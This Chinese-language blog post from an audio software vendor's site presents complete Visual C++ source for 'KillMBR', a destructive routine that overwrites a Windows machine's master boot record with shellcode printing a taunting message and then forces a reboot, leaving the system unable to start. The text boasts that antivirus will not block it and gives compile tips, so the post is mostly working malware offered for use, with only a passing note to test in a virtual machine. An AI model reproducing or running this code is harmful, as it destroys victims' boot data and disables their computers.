DJ音乐盒 | 外置伴侣 | MC词宝盒| SAM机架 | kx3552驱动

一键电音、kx驱动,主播音效软件商业定做

野狼音频科技

咨询QQ:136677098

野狼音频科技软件园

VC实现硬盘锁KillMBR破坏系统

作者:野狼音频科技   时间:2015-02-07    浏览:

很多人都想破坏操作系统通常的办法是破坏注册表或者删除系统文件实现系统瘫痪无法启动,如果有杀毒软件的话这些操作都是枉然了,下面我们来看一段VC破坏硬盘MBR实现系统无法启动的方法,而且杀毒软件不会拦截哦。

unsigned char scode[] =   // 硬盘锁
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18"
"\x00\xb8\x01\x13\xbb\x0c\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x46\x75\x63\x6B\x20"
"\x59\x6F\x75\x20\x42\x79\x20\x51\x51\x3A\x31\x32\x33\x2A\x2A\x33\x32\x31";
 
int KillMBR()
{
// ExitWindowsExT   pExitWindowsEx =  (ExitWindowsExT)GetProcAddress(LoadLibrary("USER32.dll"), "ExitWindowsEx");
HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR[512] = {0};
 
// 重新构造MBR
memcpy(pMBR, scode, sizeof(scode) - 1);
pMBR[510] = 0x55;
pMBR[511] = 0xAA;
 
hDevice = CreateFile("\\\\.\\PHYSICALDRIVE0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
return -1;
DeviceIoControl(hDevice, FSCTL_LOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL);
// 写入病毒内容
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl(hDevice, FSCTL_UNLOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL);
CloseHandle(hDevice);
Sleep(2000);
DWORD   dwVersion   =   GetVersion();   
    if   (dwVersion   <   0x80000000)   //   Is   NT   or   2000!   
    {   HANDLE   hToken;   TOKEN_PRIVILEGES   tkp;   
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES   |   TOKEN_QUERY,   &hToken); 
LookupPrivilegeValue(NULL,   SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid); 
tkp.PrivilegeCount   =   1;   //   set   privilege   
tkp.Privileges[0].Attributes   =   SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,   FALSE,   &tkp,   0,(PTOKEN_PRIVILEGES)NULL,   0); 
ExitWindowsEx(EWX_FORCE+EWX_REBOOT,   0);   }  
else   //   Is   9x   or   Me   
ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);
ExitProcess(-1);
return 0;
} Love代码 www.lvcode.com 

在VC6如果要使用上面的代码需要加入头文件 #include <winioctl.h> 否则有些宏无法使用会报错,另外上面代码运行后会破坏硬盘MBR,破坏后系统将无法启动,需要修复MBR就可以了,运行后系统也会立即重启,建议如果要测试请在虚拟机中测试
野狼音频科技软件园